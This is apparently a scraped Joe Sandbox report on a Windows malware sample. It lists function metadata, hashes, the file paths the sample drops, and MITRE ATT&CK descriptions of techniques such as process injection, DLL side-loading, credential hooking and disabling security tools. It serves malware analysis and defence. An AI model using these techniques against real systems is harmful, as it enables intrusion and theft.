Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2

_memmove.LIBCMT ref: 03D8AB2E

Strings

vector<T> too long, xrefs: 03D8AAFE

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 6b7c90d7c2013a581cfef2ef5397143ecafc2169812df78208e7132d1ca880e9
Instruction ID: f271cd957adf81d8f919d2d1ac77cf0b00d0ee441107740009738ca29d23f158
Opcode Fuzzy Hash: 6b7c90d7c2013a581cfef2ef5397143ecafc2169812df78208e7132d1ca880e9
Instruction Fuzzy Hash: 12014FB1A0020A9FDB24DFBDD895C6AB3E9EF54614718492EE45AC7744E674F900C760

Function 03DA7023 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03D9CBE6: __getptd.LIBCMT ref: 03D9CBEC
Part of subcall function 03D9CBE6: __getptd.LIBCMT ref: 03D9CBFC

__getptd.LIBCMT ref: 03DA7032

Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55

__getptd.LIBCMT ref: 03DA7040

Strings

csm, xrefs: 03DA704E

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: e79c8a428b9d62cf98c6b4795c7d5392219bb901564b61f351c0f04b6a5c85e1
Instruction ID: 17e8b7e0202dbadba99ca1aa520f3e9e514a037954f0e249838e0a411d87d957
Opcode Fuzzy Hash: e79c8a428b9d62cf98c6b4795c7d5392219bb901564b61f351c0f04b6a5c85e1
Instruction Fuzzy Hash: B1016D38900F058ACF34DFBDC644AAEF3B9BF14611F58496ED4819A390CB31D5A4EB55

Function 032C32A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 032C32B5

Part of subcall function 032B93AB: __getptd_noexit.LIBCMT ref: 032B93AE
Part of subcall function 032B93AB: __amsg_exit.LIBCMT ref: 032B93BB

__getptd.LIBCMT ref: 032C32C3

Strings

csm, xrefs: 032C32D1

Memory Dump Source

Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 5ac3f6aed89f99deafff0cf3e9e67774b1ea6b5ea2ae6558ee91c8208a5f5982
Instruction ID: 641bb32ff3f0215c7f72760b41a138a3ffc74785e47738d34046d3b77bd9ad1e
Opcode Fuzzy Hash: 5ac3f6aed89f99deafff0cf3e9e67774b1ea6b5ea2ae6558ee91c8208a5f5982
Instruction Fuzzy Hash: BC012839834386CACF38DF64C8406ACB3B9AF04211F1C8E6DD5819B2A0CF7989C1CB91

Function 02F138D9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02F133BE: __getptd.LIBCMT ref: 02F133C4
Part of subcall function 02F133BE: __getptd.LIBCMT ref: 02F133D4

__getptd.LIBCMT ref: 02F138E8

Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE

__getptd.LIBCMT ref: 02F138F6

Strings

csm, xrefs: 02F13904

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 5ac3f6aed89f99deafff0cf3e9e67774b1ea6b5ea2ae6558ee91c8208a5f5982
Instruction ID: 9128ea84d71b5952d65e1857bfd8f2639f753c26f816b4a5d846b2201be8e379
Opcode Fuzzy Hash: 5ac3f6aed89f99deafff0cf3e9e67774b1ea6b5ea2ae6558ee91c8208a5f5982
Instruction Fuzzy Hash: CB01AD35C04209CBDF349F62C9A07ACB3B7AF107A0FD504AEDA889A6A4DF308581CF01

Function 6C3FAD7B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6C3F71FB: __getptd.LIBCMT ref: 6C3F7201
Part of subcall function 6C3F71FB: __getptd.LIBCMT ref: 6C3F7211

__getptd.LIBCMT ref: 6C3FAD8A

Part of subcall function 6C3D9165: __getptd_noexit.LIBCMT ref: 6C3D9168
Part of subcall function 6C3D9165: __amsg_exit.LIBCMT ref: 6C3D9175

__getptd.LIBCMT ref: 6C3FAD98

Strings

csm, xrefs: 6C3FADA6

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 0935d24a3e66885606170b8caa28f84b00683a3f1a8be348b3a851d274276c2e
Instruction ID: 291d0543a9719f8803bddcde15e1e75bfc891738dd6efea8e466777bec322570
Opcode Fuzzy Hash: 0935d24a3e66885606170b8caa28f84b00683a3f1a8be348b3a851d274276c2e
Instruction Fuzzy Hash: 03011D358013058BCB248F61C46069EB7B5AF0431AF644D2DE8A557F90DF3295DACF62

Function 6C3F3C6F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 6C3F3C74
__NMSG_WRITE.LIBCMT ref: 6C3F3C82

Strings

PNv, xrefs: 6C3F3C74

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: DecodePointer
String ID: PNv
API String ID: 3527080286-4070351811
Opcode ID: 052d82803b6134d1ba4642bf5bc32e78533162671bbd6ce74b6a736e59ff1fe6
Instruction ID: 2528a15a760772f3972762ad4324d52a1bd5f062971a1ab504bea896d38dd58c
Opcode Fuzzy Hash: 052d82803b6134d1ba4642bf5bc32e78533162671bbd6ce74b6a736e59ff1fe6
Instruction Fuzzy Hash: 3FC08C3038121029F9507BF00D26B9810188B86B0CF050821FA249CAC0EAD282150933

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report N6xnw0iEGs.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\IemFNe\Fj0RhXL.exe

C:\Program Files (x86)\IemFNe\MSVCP140.dll

C:\Program Files (x86)\IemFNe\VCRUNTIME140.dll

C:\Program Files (x86)\IemFNe\libcef.dll

C:\Program Files (x86)\IemFNe\t3d.tmp

C:\Program Files (x86)\IemFNe\t4d.tmp

C:\Program Files (x86)\IemFNe\t5d.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tant[1].bmp

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
N6xnw0iEGs.exe

Function 1000839B Relevance: 4.9, APIs: 3, Instructions: 395
timeCOMMON

Function 1000324B Relevance: 206.1, APIs: 71, Strings: 46, Instructions: 1341
sleepregistrylibraryCOMMON

Function 10008A7E Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 252
filetimeCOMMON

Function 10002C08 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111
filesleepCOMMON

Function 100028B9 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 236
fileCOMMON

Function 10008930 Relevance: 10.6, APIs: 7, Instructions: 114
COMMON

Function 10009824 Relevance: 9.3, APIs: 6, Instructions: 301
COMMON

Function 10002D6B Relevance: 6.1, APIs: 4, Instructions: 68
fileCOMMON

Function 1000B4C8 Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Function 10007E91 Relevance: 4.6, APIs: 3, Instructions: 127
COMMON

Function 10007777 Relevance: 4.6, APIs: 3, Instructions: 113
COMMON

Function 1000752C Relevance: 4.6, APIs: 3, Instructions: 60
fileCOMMON

Function 100078A8 Relevance: 3.1, APIs: 2, Instructions: 135
COMMON

Function 1000B217 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre